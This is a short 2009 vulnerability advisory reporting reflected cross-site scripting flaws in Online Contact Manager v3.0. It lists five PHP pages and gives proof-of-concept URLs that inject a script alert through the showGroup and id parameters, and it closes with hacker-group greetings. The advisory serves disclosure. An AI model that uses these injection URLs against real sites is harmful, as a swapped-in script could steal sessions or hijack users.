=========================================================================================
Title : Multiple Cross-site Scripting (XSS) Vulnerability
Software : Online Contact Manager v3.0
Vendor : www.esoftpro.com
Date : 19 April 2009
Author : Vrs-hCk
Contact : d00r@telkom.net
Blog : c0li.BlogSpot.Com
=========================================================================================
[-] Vulnerable
index.php
view.php
email.php
edit.php
delete.php
[-] Exploit
http://[site]/[path]/index.php?showGroup=+<script>alert(123)</script>
http://[site]/[path]/view.php?id=+<script>alert(123)</script>
http://[site]/[path]/email.php?id=+<script>alert(123)</script>
http://[site]/[path]/edit.php?id=+<script>alert(123)</script>
http://[site]/[path]/delete.php?id=+<script>alert(123)</script>
=========================================================================================
[-] Greetz :
Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy,
bl4Ck_3n91n3, H312Y, S3T4N, Janroe, and special muaacchh utk Dia yg Ku Cintai (*_^)
c0li.m0de.0n and Behave oR BeGone !!!
=========================================================================================